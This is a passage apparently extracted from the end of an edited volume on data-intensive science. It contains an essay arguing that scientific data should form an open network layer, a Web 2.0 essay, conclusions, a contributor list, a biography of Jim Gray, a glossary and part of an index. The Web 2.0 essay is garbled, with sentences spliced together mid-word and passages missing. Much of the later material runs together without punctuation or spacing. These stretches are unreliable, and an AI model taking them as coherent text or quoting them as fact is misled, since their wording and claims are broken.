Thus, this is actually not a paradigm shift in the Kuhnian sense. Data is not sweeping away the old reality. Data is simply placing a set of burdens on the methodologies and social habits we use to deal with and communicate our empiricism and our theory, on the robustness and complexity of our simulations, and on the way we expose, transmit, and integrate our knowledge. What needs to change is our paradigm of ourselves as scientists - not the old paradigms of discovery. When we started to realize that stuff was made of atoms, that we were made of genes, that the Earth revolved around the sun, those were paradigm shifts in the Kuhnian sense. What we're talking about here cuts across those classes of shift. Data-intensive science, if done right, will mean more paradigm shifts of scientific theory, happening faster, because we can rapidly assess our worldview against the objective reality we can so powerfully measure. The data deluge strategy might be better informed by networks than by Kuhnian dynamics. Networks have a capacity to scale that is useful in our management of the data overload - they can convert massive amounts of information into a good thing so the information is no longer a problem that must be solved. And there is a lesson in the way networks are designed that can help us in exploring the data deluge: if we are to manage the data deluge, we need an open strategy that follows the network experience.
By this I mean the end-to-end, layer-by-layer designed information technology and communications networks that are composed of no more than a stack of protocols. The Internet and the Web have been built from documents that propose standard methods for transferring information, describing how to display that information, and assigning names to computers and documents. Because we all agree to use those methods, because those methods can be used by anyone without asking for permission, the network emerges and scales. In this view, data is not a fourth paradigm but a fourth network layer (atop Ethernet, TCP/IP, and the Web [4]) that interoperates, top to bottom, with the other layers. I believe this view captures the nature of the scientific method a little better than the concept of the paradigm shift, with its destructive nature. Data is the result of incremental advances in empiricism-serving technology. It informs theory, it drives and validates simulations, and it is served best by two-way, standard communication with those layers of the knowledge network. To state it baldly, the paradigm that needs destruction is the idea that we as scientists exist as un-networked individuals. Now, if this metaphor is acceptable, it holds two lessons for us as we contemplate network design for scholarly communication at the data-intensive layer.

The first lesson, captured perfectly by David Isenberg, is that the Internet derives its disruptive quality from a very special property: IT IS PUBLIC. [5] It's public in several ways. The standard specifications that define the Internet are themselves open and public - free to read, download, copy, and make derivatives from. They're open in a copyright sense. Those specifications can be adopted by anyone who wants to make improvements and extensions, but their value comes from the fact that a lot of people use them, not because of private improvements. As Isenberg notes, this allows a set of miracles to emerge: the network grows without a master, lets us innovate without asking for permission, and grows and discovers markets (think e-mail, instant messaging, social networks, and even pornography). Changing the public nature of the Internet threatens its very existence. This is not intuitive to those of us raised in a world of rivalrous economic goods and traditional economic theory. It makes no sense that Wikipedia exists, let alone that it kicks Encyclopedia Britannica to the curb. As Galileo might have said, however, "And yet it moves." [6] Wikipedia does exist, and the network - a consensual hallucination defined by a set of dry requests for comments - carries Skype video calls for free between me and my family in Brazil. It is an engine for innovation the likes of which we have never seen. And from the network, we can draw the lesson that new layers of the network related to data should encode the idea of publicness - of standards that allow us to work together openly and transfer the network effects we know so well from the giant collection of documents that is the Web to the giant collections of data we can so easily compile.
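The point about publicness can be made concrete with a minimal sketch. Everything in the snippet below is illustrative rather than drawn from the essay: the field names and URLs are hypothetical placeholders, not a published vocabulary or a real service. The only claim is that a data layer inherits the Web's open character when its descriptions are plain, openly licensed documents that any client can fetch, parse, and build on without asking permission.

```python
import json

# A hypothetical, machine-readable description of a dataset. The field names
# and URLs are placeholders for illustration, not a real standard or service.
dataset_record = {
    "id": "https://example.org/data/plankton-survey-2009",            # stable public URI
    "title": "Plankton survey time series, 2009",
    "license": "https://creativecommons.org/publicdomain/zero/1.0/",  # open license URI
    "distribution": "https://example.org/data/plankton-survey-2009.csv",
    "format": "text/csv",
}

# Serialized as plain JSON and served over plain HTTP, the record rides on the
# same open protocol stack as any Web page: no gatekeeper decides who may read
# it, link to it, or combine it with other records.
print(json.dumps(dataset_record, indent=2))
```

Whether such descriptions end up expressed in JSON, RDF, or some other format matters less than the agreement to use a common, public one - the same design choice that allowed the document Web to scale.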
The second lesson comes from another open world, that of open source software. Software built on the model of distributed, small contributions joined together through technical and legal standardization was another theoretical impossibility subjected to a true Kuhnian paradigm shift by the reality of the Internet. The ubiquitous ability to communicate, combined with the low cost of acquiring programming tools and the visionary application of public copyright licenses, had the strangest impact: it created software that worked, and scaled. The key lesson is that we can harness the power of millions of minds if we standardize, and the products can in many cases outperform those built in traditional, centralized environments. (A good example is the Apache Web server, which has been the most popular Web server software on the Internet since 1996.) Creative Commons applied these lessons to licensing and created a set of standard licenses for cultural works. These have in turn exploded to cover hundreds of millions of digital objects on the network. Open licensing turns out to have remarkable benefits - it allows for the kind of interoperability (and near-zero transaction costs) that we know from technical networks to occur on a massive scale for rights associated with digital objects such as songs and photographs - and scientific information.

Incentives are the confounding part of all of this to traditional economic theory. Again, this is a place where a Kuhnian paradigm shift is indeed happening - the old theory could not contemplate a world in which people did work for free, but the new reality proves that it happens. Eben Moglen provocatively wrote in 1999 that collaboration on the Internet is akin to electrical induction - an emergent property of the network unrelated to the incentives of any individual contributor. We should not ask why there is an incentive for collaborative software development any more than we ask why electrons move in a current across a wire. We should instead ask, what is the resistance in the wire, or in the network, to the emergent property? Moglen's Metaphorical Corollaries to Faraday's Law and Ohm's Law still resonate 10 years on. (His corollary to Faraday's Law says that if you wrap the Internet around every person on the planet and spin the planet, software flows in the network; it is an emergent property of connected human minds that they create things for one another's pleasure and to conquer their uneasy sense of being too alone. The only question to ask is, what's the resistance of the network? His corollary to Ohm's Law states that the resistance of the network is directly proportional to the field strength of the intellectual property system. [7])

There is a lot of resistance in the network to a data-intensive layer. And it's actually not based nearly as much on intellectual property issues as it was on software (although the field strength of copyright in resisting the transformation of peer-reviewed literature is very strong and is actively preventing the Web revolution in that realm of scholarly communication). With data, problems are caused by copyright (data receives wildly different copyright treatment across the world, which causes confusion and makes international licensing schemes complex and difficult [8]), but resistance also comes from many other sources: it's hard to annotate and reuse data, it's hard to send massive data files around, it's hard to combine data that was not generated for recombination, and on and on. Thus, to those who didn't generate it, data has a very short half-life. This resistance originates with the paradigm of ourselves as individual scientists, not the paradigms of empiricism, theory, or simulation. I therefore propose that our focus be Moglen-inspired and that we resist the resistance. We need investment in annotation and curation, in capacity to store and render data, and in shared visualization and analytics. We need open standards for sharing and exposing data. We need the RFCs (Requests for Comments) of the data layer. And, above all, we need to teach scientists and scholars to work in this new layer of data. As long as we practice a micro-specialization guild culture of training, the social structure of science will continue to provide significant resistance to the data layer. We need to think of ourselves as connected nodes that need to pass data, test theories, access each other's simulations.
And given that every graph about data collection capacity is screaming up exponentially, we need scale in our capacity to use that data, and we need it badly. We need to network ourselves and our knowledge. Nothing else we have designed to date as humans has proven to scale as fast as an open network.

Like all metaphors, the network one has its limits. Networking knowledge is harder than networking documents. Emergent collaboration in software is easier because the tools are cheap and ubiquitous - that's not the case in high-throughput physics or molecular biology. Some of the things that make the Web great don't work so well for science and scholarship because the concept of agreement-based ratings finds you only the stuff that represents a boring consensus and not the interesting stuff along the edges. But there is precious little in terms of alternatives to the network approach. The data deluge is real, and it's not slowing down. We can measure more, faster, than ever before. We can do so in massively parallel fashion. And our brain capacity is pretty well frozen at one brain per person. We have to work together if we're going to keep up, and networks are the best collaborative tool we've ever built as a culture. And that means we need to make our data approach just as open as the protocols that connect computers and documents. It's the only way we can get the level of scale that we need.

There is another nice benefit to this open approach. We have our worldviews and paradigms, our opinions and our arguments. It's our nature to think we're right. But we might be wrong, and we are most definitely not completely right. Encoding our current worldviews in an open system would mean that those who come along later can build on top of us, just as we build on empiricism and theory and simulation, whereas encoding ourselves in a closed system would mean that what we build will have to be destroyed to be improved. An open data layer to the network would be a fine gift to the scientists who follow us into the next paradigm - a grace note of good design that will be remembered as a building block for the next evolution of the scientific method.

References
[1] T. S. Kuhn, The Structure of Scientific Revolutions. Chicago: University of Chicago Press, 1996.
[2] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, pp. 1297-1298, Mar. 6, 2009, doi: 10.1126/science.1170411.
[3] J. Gray and A. Szalay, eScience - A Transformed Scientific Method, presentation to the Computer Science and Technology Board of the National Research Council, Mountain View, CA, Jan. 11, 2007. (Edited transcript in this volume.)
[4] Joi Ito, keynote presentation at ETech, San Jose, CA, Mar. 11, 2009.
[5] Broadband without Internet ain't worth squat, by David Isenberg, keynote address delivered at Broadband Properties Summit, accessed on Apr. 30, 2009, at broadband-without-internet-ain-worth.html.
[6] Wikipedia, accessed on Apr. 30, 2009.
[7] E. Moglen, Anarchism Triumphant: Free Software and the Death of Copyright, First Monday, vol. 4, no. 8, Aug. 1999.
[8] Science Commons Protocol on Open Access Data, publishing/open-access-data-protocol.

Clay Shirky put it best. During his Lessons from Napster talk at the O'Reilly Peer-to-Peer Conference in 2001, he invited his audience to consider the infamous prediction of IBMsinsideirkys together with the related observation that the dominant computing platform of our time is not Unix or Windows or Mac OS, but rather the Web itself - led Tim O'Reilly to develop a vision for what he once called an Internet operating system [2], which subsequently evolved into a meme now known around the world as Web 2.0 [3]. Wrapped in that pithy (and now, unfortunately, overexploited) phrase are two important concepts. First, Web 2.0 acted as a reminder that, despite the dot-com crash of 2001, the Web was - and still is - changing the world in profound ways. Second, it incorporated a series of best-practice themes (or design patterns and business models) for maximizing and capturing this potential. These themes included:
- Network effects and architectures of participation
- The Long Tail
- Software as a service
- Peer-to-peer technologies
- Trust systems and emergent data
- Open APIs and mashups
- AJAX
- Tagging and folksonomies
- Data as the new Intel Inside

approaches that fully exploit the Web, at least in their professional lives. Blogging, for example, has not taken off in the same way that it has among technologists, political pundits, economists, or even mathematicians. Furthermore, collaborative environments such as OpenWetWare and Nature Network have yet to achieve anything like mainstream status among researchers. Physicists long ago learned to share their findings with one another using the arXiv preprint server, but only because it replicated habits that they had previously pursued by post and then e-mail. Life and Earth scientists, in contrast, have been slower to adopt similar services, such as Nature Precedingsand arising from this gradual but inevitable embrace of information technologywe now contains a great deal of high-quality scientific information, much of it provided by scientists themselves. This includes rich, well-organized, and interlinked information about many thousands of chemical compounds. Meanwhile, more specialized resources from both public and private initiatives - notably PubChem and ChemSpider - are growing in content, contributions, and usage despite the fact that chemistry has historically been a rather proprietary domain. (Or perhaps in part because of it, but that is a different essay.) And speaking of proprietary domains, consider drug discovery. InnoCentive (www.innocentive.com), a company spun off from Eli Lilly, has blazed a trail with a model of open, Web-enabled, onedimensional Googles domainsthe textual, semi-structured world of journals and the numeric, highly structured world of databasestoindeed, all of human knowledge worldsand a lasting testament to our species and our age.

References
[1] C. Shirky, Lessons from Napster, talk delivered at the O'Reilly Peer-to-Peer Conference, Feb. 15, 2001.
[2] T. O'Reilly, Inventing the Future, 2002, future.html.
[3] T.
OReilly, What Is Web 2.0, 2005, what-is-web-20.html. [4] T. Berners-Lee, Weaving the Web. San Francisco: HarperOne, 1999. [5] International Consortium Announces the 1000 Genomes Project,. [6] J. C. Venter et al., Environmental genome shotgun sequencing of the Sargasso Sea, Science, vol. 304, pp. 6674, 2004, doi:10.1126/science.1093857. [7] C. Anderson, The End of Theory: The Data Deluge Makes the Scientific Method Obsolete, Wired, June 2008,. [8] S. Brin and L. Page, The Anatomy of a Large-Scale Hypertextual Web Search Engine, 1998,. [9] [10] [11] [12] E. O. Wilson, Consilience: The Unity of Knowledge. New York: Knopf, 1998. 220 223 client-plus-cloud computing, natural user interfaces, and quantum computing that promises to revolutionize scientific discovery. Data-intensive science promises breakthroughs across a broad spectrum. As the Earth becomes increasingly instrumented with low-cost, high-bandwidth sensors, we will gain a better understanding of our environment via a virtual, distributed whole-Earth macroscope. Similarly, the night sky is being brought closer with high-bandwidth, widely available data-visualization systems. This virtuous circle of computing technology and data access will help educate the public about our planet and the Universe at largemaking us all participants in the experience of science and raising awareness of its immense benefit to everyone. In healthcare, a shift to data-driven medicine will have an equally transformative impact. The ability to compute genomics and proteomics will become feasible on a personal scale, fundamentally changing how medicine is practiced. Medical data will be readily available in real timetracked, benchmarked, and analyzed against our unique characteristics, ensuring that treatments are as personal as we are individual. Massive-scale data analytics will enable real-time tracking of disease and targeted responses to potential pandemics. Our virtual macroscope can now be used on ourselves, as well as on our planet. And all of these advances will help medicine scale to meet the needs of the more than 4 billion people who today lack even basic care. As computing becomes exponentially more powerful, it will also enable more natural interactions with scientists. Systems that are able to understand and have far greater contextual awareness will provide a level of proactive assistance that was previously available only from human helpers. For scientists, this will mean deeper scientific insight, richer discovery, and faster breakthroughs. Another major advance is the emergence of megascale services that are hosted in the cloud and that operate in conjunction with client computers of every kind. Such an infrastructure will enable wholly new data delivery systems for scientistsoffering them new ways to visualize, analyze, and interact with their data, which will in turn enable easier collaboration and communication with others. This enhanced computing infrastructure will make possible the truly global digital library, where the entire lifecycle of academic researchfrom inception to publicationwill take place in an electronic environment and be openly available to all. During the development of scientific ideas and subsequent publishing, scientists will be able to interact virtually with one anothersharing data sources, workflows, and research. Readers, in turn, will be able to navigate the text of a 224 publication and easily view related presentations, supporting images, video, audio, data, and analyticsall online. 
Scientific publication will become a 24/7, worldwide, real-time, interactive experience. I am encouraged to see scientists and computer scientists working together to address the great challenges of our age. Their combined efforts will profoundly and positively affect our future. 225 The well-formed.eigenfactor project visualizes information flow in science. It came about as a collaboration between the Eigenfactor project (data analysis) and Moritz Stefaner (visualization). This diagram shows the citation links of the journal Nature. More information and visualizations can be found at. 226 Conclusions y the mid-1990s, jim gray had recognized that the next big data challenges for database technology would come from science and not from commerce. He also identified the technical challenges that such data-intensive science would pose for scientists and the key role that IT and computer science could play in enabling future scientific discoveries. The term eScience was coined in the year 2000 by John Taylor, when he was director general of the UK Research Councils. Taylor had recognized the increasingly important role that IT must play in the collaborative, multidisciplinary, and data-intensive scientific research of the 21st century and used the term eScience to encompass the collection of tools and technologies needed to support such research. In recognition of the UK eScience initiative, Jim Gray called his research group at Microsoft Research the eScience Group, and he set about working with scientists to understand their problems and learn what tools they needed. In his talk to the Computer Science and Telecommunications Board of the U.S. National Research Council in 2007, Jim expanded on his vision of data-intensive science and enumerated seven key areas for action by the funding agencies: 1. Foster both the development of software tools and support for these tools. 2. Invest in tools at all levels of the funding pyramid. 3. Foster the development of generic Laboratory Information Management Systems (LIMS). 4. Foster research into scientific data management, data analysis, data visualization, and new algorithms and tools. 227 5. Establish digital libraries that support other sciences in the same way the National Library of Medicine supports the bio-sciences. 6. Foster the development of new document authoring tools and publication models. 7. Foster the development of digital data libraries that contain scientific data (not just the metadata) and support integration with published literature. We believe that these challenges to the funding agencies are just as important today. This is why we have introduced this collection of essays, along with a version of Jims talk to the NRC-CSTB constructed from the transcript of his lecture and his presentation slides. It is also educational to see the continuing momentum and progress of the eScience community since the report Towards 2020 Science published by our colleagues at Microsoft Research, Cambridge, UK.1 That was based on a workshop in July 2005, attended by some of the authors in this new book, and subsequently inspired Natures 2020 Computing special issue in March 2006.2 At the heart of scientific computing in this age of the Fourth Paradigm is a need for scientists and computer scientists to work collaborativelynot in a superior/subordinate relationship, but as equalswith both communities fueling, enabling, and enriching our ability to make discoveries that can bring about productive and positive changes in our world. 
In this book, we have highlighted healthcare and the environment, just two areas in which humanity faces some of its biggest challenges. To make significant progress, the research community must be supported by an adequate cyberinfrastructure comprising not only the hardware of computing resources, datacenters, and high-speed networks but also software tools and middleware. Jim also envisaged the emergence of a global digital research library containing both the research literature and the research data. Not only are we seeing the maturing of data-intensive science, but we are also in the midst of a revolution in scholarly communication. This is driven not only by technologies such as the Internet, Web 2.0, and semantic annotations but also by the worldwide movement toward open access and open science. This book is really a labor of love. It started with Jims desire to enable scientific research through the technologies of computer sciencecutting across the disciplines highlighted herein and beyond. We see this book as a continuation of Jims work with the science community. We deliberately asked our scientific contributors 1 2 Nature, vol. 440, no. 7083, Mar. 23, 2006, pp. 383580. 228 CONCLUSIONS to move out of their professional comfort zones and share their visions for the future of their research fields on a 5-to-10-year horizon. We asked them to write their contributions not only in essay form, which is often a greater challenge than writing a purely technical research article, but often in collaboration with a computer scientist. We are grateful to all of our contributors for rising to this challenge, and we hope that they (and you!) will be pleased with the result. Several decades ago, science was very discipline-centric. Today, as evidenced by the articles in this book, significant advances are being made as a result of multidisciplinary collaborationand will continue to be made into the future. The essays in this book present a current snapshot of some of the leading thinking about the exciting partnership between science and computer sciencea data revolution which makes this information timely and potentially fleeting. However, it is our fervent hope and belief that the underlying message presented by the totality of these articles will be durable for many years. Finally, we offer this book as a call to action for the entire research community, governments, funding agencies, and the public. We urge collaboration toward a common goal of a better life for all humanity. We find ourselves in a phase in which we need to use our scientific understanding to achieve specific goals for the sake of humanitys survival. It is clear that to achieve this aim, we very much need experts with deep scientific knowledge to work closely with those who have deep experience with technology. This situation is somewhat analogous to the 1940s, when U.S. and European physicists answered an urgent call from governments to collaborate on the Manhattan Project. Today, scientists must collaborate globally to solve the major environmental and health problems facing humanity in a race that is perhaps even more urgent. And ironically, the nuclear physics developed in the Manhattan Project is likely to provide part of the answer in supplying the world with zero-carbon energy. 229 ne x t ste ps we hope this book will inspire you to take action as well as embark on further study. We are walking the talk ourselves at Microsoft Research. 
For example, we have reformulated our academic partnership organization, External Research, to focus on the themes presented in this book. These themes incorporate active research in dynamic fields, so it is hard to track and predict the future evolution of the ideas presented in this book. But here are some suggested ways to remain engaged and to join in the dialogue: If youre a scientist, talk to a computer scientist about your challenges, and vice versa. If youre a student, take classes in both science and computer science. If youre a teacher, mentor, or parent, encourage those in your care toward interdisciplinary study in addition to giving them the option to specialize. Engage with the editors and authors of this book through the normal scholarly channels. Keep up to date with our eScience research collaborations through our Web site:. Be active in the eScience communityat the Fourth Paradigm Web site below, we suggest helpful resources. 230 NEXT STEPS AC K N OWL E DG M E N T S to all the contributors to this book for sharing their visions within the Fourth Paradigm. We also thank our families and colleagues for their support during the intensive editorial process. The exceptional efforts of the project team, including Ina Chang, Marian Wachter, Celeste Ericsson, and Dean Katz, are also gratefully acknowledged. And, of course, we thank Jim Gray, for inspiring us. the editors express their heartfelt thanks CONTRIBUTORS Mark R. Abbott Oregon State University Dennis D. Baldocchi University of California, Berkeley Roger S. Barga Microsoft Research Mathias Bavay WSL Institute for Snow and Avalanche Research SLF Gordon Bell Microsoft Research Chris Bishop Microsoft Research Jos A. Blakeley Microsoft Iain Buchan University of Manchester Graham Cameron EMBL-European Bioinformatics Institute Luca Cardelli Microsoft Research Michael F. Cohen Microsoft Research Nicholas Dawes WSL Institute for Snow and Avalanche Research SLF Del DeHart Robertson Research Institute John R. Delaney University of Washington David De Roure University of Southampton John Dickason Private practice Lee Dirks Microsoft Research Jeff Dozier University of California, Santa Barbara Dan Fay Microsoft Research Craig Feied Microsoft Anne Fitzgerald Queensland University of Technology Brian Fitzgerald Queensland University of Technology Peter Fox Rensselaer Polytechnic Institute William B. Gail Microsoft Dennis Gannon Microsoft Research Michael Gillam Microsoft Paul Ginsparg Cornell University Carole Goble University of Manchester Alyssa A. Goodman Harvard University Daron Green Microsoft Research 231 Jonathan Handler Microsoft Timo Hannay Nature Publishing Group Charles Hansen University of Utah David Heckerman Microsoft Research James Hendler Rensselaer Polytechnic Institute Eric Horvitz Microsoft Research James R. Hunt University of California, Berkeley, and the Berkeley Water Center Chris R. Johnson University of Utah William Kristan University of California, San Diego Carl Lagoze Cornell University James Larus Microsoft Research Michael Lehning WSL Institute for Snow and Avalanche Research SLF Jeff W. 
Lichtman Harvard University Clifford Lynch Coalition for Networked Information Simon Mercer Microsoft Research Eliza Moody Microsoft Craig Mundie Microsoft Suman Nath Microsoft Research Kylie Pappalardo Queensland University of Technology Savas Parastatidis Microsoft Marc Parlange cole Polytechnique Fdrale de Lausanne Valerio Pascucci University of Utah Hanspeter Pfister Harvard University Catherine Plaisant University of Maryland Corrado Priami Microsoft Research - University of Trento Centre for Computational and Systems Biology and University of Trento Dan Reed Microsoft Research R. Clay Reid Harvard University Joel Robertson Robertson Research Institute Ben Shneiderman University of Maryland Claudio T. Silva University of Utah Mark Smith University of Maryland Christopher Southan EMBL-European Bioinformatics Institute Alexander S. Szalay The Johns Hopkins University Kristin Tolle Microsoft Research Herbert Van de Sompel Los Alamos National Laboratory Catharine van Ingen Microsoft Research John Wilbanks Creative Commons John Winn Microsoft Research Curtis G. Wong Microsoft Research Feng Zhao Microsoft Research 232 ACKNOWLEDGMENTS Dr. James Nicholas Jim Gray (born 1944, missing at sea on January 28, 2007) was esteemed for his groundbreaking work as a programmer, database expert, engineer, and researcher. He earned his Ph.D. from the University of California, Berkeley, in 1969becoming the first person to earn a doctorate in computer science at that institution. He worked at several major high-tech companies, including Bell Labs, IBM Research, Tandem, Digital Equipment Corporation, and finally Microsoft Research in Silicon Valley. Jim joined Microsoft in 1995 as a Senior Researcher, ultimately becoming a Technical Fellow and managing the Bay Area Research Center (BARC). His primary research interests were large databases and transaction processing systems. He had a longstanding interest in scalable computingbuilding super-servers and work group systems from commodity software and hardware. His work after 2002 focused on eScience: applying computers to solve data-intensive scientific problems. This culminated in his vision (with Alex Szalay) of a fourth paradigm of science, a logical progression of earlier, historical phases dominated by experimentation, theory, and simulation. Jim pioneered database technology and was among the first to develop the technology used in computerized transactions. His work helped develop e-commerce, online ticketing, automated teller machines, and deep databases that enable the success of todays high-quality modern Internet search engines. In 1998, he received the ACM A.M. Turing Award, the most prestigious honor in computer science, for seminal contributions to database and transaction processuring award winner and american computer scientist 235 ing research and technical leadership in system implementation. He was appointed an IEEE Fellow in 1982 and also received the IEEE Charles Babbage Award. His later work in database technology has been used by oceanographers, geologists, and astronomers. Among his accomplishments at Microsoft were the TerraServer Web site in collaboration with the U.S. Geological Survey, which paved the way for modern Internet mapping services, and his work on the Sloan Digital Sky Survey in conjunction with the Astrophysical Research Consortium (ARC) and others. Microsofts WorldWide Telescope software, based on the latter, is dedicated to Jim. 
Jim always reached out in two waystechnically and personally, says David Vaskevitch, Microsofts senior corporate vice president and chief technical officer in the Platform Technology & Strategy division. Technically, he was always there first, pointing out how different the future would be than the present. Many people in our industry, including me, are deeply indebted to Jim for his intellect, his vision, and his unselfish willingness to be a teacher and a mentor, says Mike Olson, vice president of Embedded Technologies at Oracle Corporation. Adds Shankar Sastry, dean of the College of Engineering at UC Berkeley, Jim was a true visionary and leader in this field. Jims impact is measured not just in his technical accomplishments, but also in the numbers of people around the world whose work he inspired, says Rick Rashid, senior corporate vice president at Microsoft Research. Microsoft Chairman Bill Gates sums up Jims legacy in this way: The impact of his thinking is continuing to get people to think in a new way about how data and software are redefining what it means to do science. Such sentiments are frequently heard from the myriad researchers, friends, and colleagues who interacted with Jim over the years, irrespective of their own prominence and reputation. Known, loved, and respected by so many, Jim Gray needs no introduction, so instead we dedicate this book to him and the amazing work that continues in his absence. The Editors 236 G lossary POWERS OF TEN exapetateragigamegakilohectodecadecicentimillimicronanopico- E P T G M k h da d c m n p 1,000,000,000,000,000,000 1,000,000,000,000,000 1,000,000,000,000 1,000,000,000 1,000,000 1,000 100 10 1 0.1 0.01 0.001 0.000001 0.000000001 0.000000000001 1018 10 10 10 10 10 10 10 10 10 10 15 12 9 6 quintillion quadrillion trillion billion million thousand hundred ten one tenth hundredth thousandth millionth billionth trillionth 3 2 1 0 1 2 Common Abbreviations Australian Square Kilometre Array Pathfinder Automatic Tape-Collecting Lathe Ultramicrotome autonomous underwater vehicle Business Process Execution Language charge-coupled device Center for Environmental Visualization Citation, Location, And Deposition in Discipline and Institutional Repositories Chemistry Markup Language central processing unit Computer Science and Telecommunications Board directed acyclic graph DNA Data Bank of Japan 237 DOE EBI ECHO EHR EMBL EMBL-Bank EOSDIS ET FDA FFT FLUXNET fMRI FTP GCMD GEOSS GOLD GPU GPGPU GUI H1N1 INSDC IT KEGG KLAS LEAD LHC LIDAR LLNL LONI MESUR MMI NASA NHS NIH NLM Department of Energy European Bioinformatics Institute Earth Observing System Clearinghouse electronic health record European Molecular Biology Laboratory European Molecular Biology Laboratory Nucleotide Sequence Database Earth Observing System Data and Information System evapotranspiration Food and Drug Administration Fast Fourier Transform A global network of micrometeorological tower sites functional magnetic resonance imaging File Transfer Protocol NASAs Global Change Master Directory Global Earth Observation System of Systems Genomes OnLine Database graphics processing unit general-purpose graphics processing unit graphical user interface swine flu International Nucleotide Sequence Database Collaboration information technology Kyoto Encyclopedia of Genes and Genomes Keystone Library Automation System Linked Environments for Atmospheric Discovery Large Hadron Collider Light Detection and Ranging Lawrence Livermore National Laboratory Laboratory of Neuro Imaging Metrics from 
Scholarly Usage of Resources Marine Metadata Interoperability National Aeronautics and Space Administration National Health Service (UK) National Institutes of Health National Library of Medicine 238 GLOSSARY NLM DTD NOAA NRC NSF OAI OAI-ORE OAI-PMH OBO OO OOI OWL Pan-STARRS PHR PubMed RDF RDFS ROV RSS SCEC SOA SWORD TCP/IP TM UNICEF UniProt URI USGS VT 100 WATERS Network WHO XML National Library of Medicine Document Type Definition National Oceanic and Atmospheric Administration National Research Council National Science Foundation Open Archives Initiative Open Archives Initiative Object Reuse and Exchange protocol Open Archives Initiative Protocol for Metadata Harvesting Open Biomedical Ontologies object-oriented Ocean Observatories Initiative Web Ontology Language Panoramic Survey Telescope And Rapid Response System personal health record Free National Library of Medicine online database of biomedical journal articles Resource Description Framework RDF Schema remotely operated vehicle Really Simple Syndication Southern California Earthquake Center service-oriented architecture Simple Web-service Offering Repository Deposit Transmission Control Protocol/Internet Protocol (the Internet Protocol Suite) transactional memory United Nations Childrens Fund Universal Protein Resource Uniform Resource Identifier U.S. Geological Survey A Digital Equipment Corporation (DEC) video terminal WATer and Environmental Research Systems Network World Health Organization eXtensible Markup Language 239 inde x A abbreviations, list of common, 237239 Accredited Social Health Activists (ASHAs), 71 ACM (Association for Computing Machinery), xxviii alpine natural hazards, forecasting, 4849 amateurs. See citizen science Amazon.com, 166 Anderson, Chris, 218 Antarctic Treaty, 203, 204 Apache Web server, 212 application-based science vs. basic science, 1418. See also science of environmental applications archiving. See also curation; digital data libraries as core function in scholarly communication, 195 data vs. literature, xii, xxviixxviii, xxx of environmental data, 48 European Nucleotide Archive, 118119 Gordon Bells view, xii and history of science, 178180 Jim Grays view, xxviixxviii, xxx NSF infrastructure efforts, xii, xv, xx, xxx, 198 of ocean science data, 31 Open Archives Initiative, 194, 198 role in Laboratory Information Management Systems, xxii role of overlay journals, xxviixxviii Armbrust, Ginger, 36 articles. See scientific papers artificial intelligence (AI), 70, 148, 169170, 189 arXiv, xxviii, 185, 217 ASKAP (Australian Square Kilometre Array Pathfinder), xiii, 147 Aster Data, 7 astronomy, xx, 3944 atmospheric science, observations motivating next-generation environmental science, 4547 Atom format, 197, 198 Australia, need for national data sharing policy framework, 205207 Australian National Data Service (ANDS), xivxv Australian Square Kilometre Array Pathfinder (ASKAP), xiii, 147 Automatic Tape-Collecting Lathe Ultramicrotome (ATLUM), 79, 80 avatars, in healthcare, 9697 Axial Seamount, 32 Azure platform, 133 B basic science vs. science based on applications, 1418 Beowulf clusters, xx, xxiv, 126 Berlin Declaration on Open Access to Knowledge in the Sciences and Humanities, 203 Bermuda Principles, 203 Berners-Lee, Tim, 171, 188189 BGI Shenzhen, 120121 Bing, xxvi BioCatalogue, 143 bioinformatics, xix. See also EBI (European Bioinformatics Institute) biological sciences. 
See Earth and environmental science; ecology; life sciences BioMart, 138 biometrics, 71 BioMoby, 167 BlenX language, 101 Blue Gene/L supercomputer, 155 BOINC (Berkeley Open Infrastructure for Network Computing), 24 BPEL (Business Process Execution Language), 140 Brahe, Tycho, xi brain, 7582. See also nervous system brainbow, 78 Bush, Vannevar, 171 bX scholarly recommender service, 196 C cabled ocean observatories, 3235 cameras, digital, 18, 43 carbon markets, 14, 15, 16 cell phones Earth and environmental science applications, 1718 as healthcare delivery vehicle in developing countries, 6869 241 CERN, xiii, 189, 216 CEV (Center for Environmental Visualization), 29, 33, 34, 36 charge-coupled devices (CCDs), 40 Chastain, Erick, 86, 87 chemistry as interconnected Web-enabled science, 217218 oreChem project, 170171 Chemistry Markup Language (CML), 170 ChemSpider, 217 Chu, Steven, 14 citation data in scholarly communication, 25, 151, 178, 186, 187, 195196, 226. See also provenance Citation Typing Ontology effort, 196 citizen science. See also crowdsourcing as contributor to localized Earth observation, 18 and gathering of astronomical data, 4043 groups as resources for ecological data, 23, 24 CLADDIER project, 196 climate change and data-intensive computing, 112116 as driver of cross-disciplinary research, 2526, 44 and ecological data analysis, 2126 role of environmental scientists, 4551 and science of environmental applications, 1314 and water system management, 1415 cloud computing advantages, 9 in astronomy, 40, 41 data as archival media, xii and ecological synthesis studies, 2425 exploiting parallelism, 132133 impact on how scientific research is undertaken and disseminated, 26, 166 linking to SQL Server Analysis Services data cube, 25 in ocean research, 31 for patient medical data, 6263 clusters in biology, 8789, 95 of computers, xx, xxiii, xxiv, 6, 126 CMT (Conference Management Tool), xxviii, xxix collaboration. See also data sharing in ecological synthesis studies, 2126 between environmental scientists and computer scientists, 4551 exploring visual and analytical challenges held in common between disciplines, 44 as necessity, 218, 228 between ocean scientists and computer scientists, 35 online opportunities for astronomical and educational communities, 42 role of Internet, 214, 216, 217 role of workflows in data-intensive science, 143 commodity computing, 23, 43, 114, 132, 235 communication. See scholarly communication community avatars, 9697 Community Collaborative Rain, Hail and Snow Network, 23 computational microscopes, 84, 8789 computational modeling, 56, 93 computational power, 43. See also parallel computing computational thinking, xx, 92 computer scientists, need for collaboration and peer relationships with domain scientists, 78, 35, 4551, 150, 228. See also dataintensive science; scientific computing Concept Web Alliance, 195 Condor software, xxiv Conference Management Tool (CMT), xxviii, xxix connectome, 77 Consortium for Ocean Leadership, 32 controlled vocabularies, xxix, 187 copyright, 182, 211, 212, 213 COUNTER project, 196 CPU. See multicore processors crawlers, 8, 9 Creative Commons, 212 crowdsourcing. See also citizen science in astronomical galaxy studies, 4041 in post-market studies of new drugs, 61 curation, xiiixv, xvii, xxvii, 180, 181. See also archiving; provenance 242 INDEX cyberinfrastructure. 
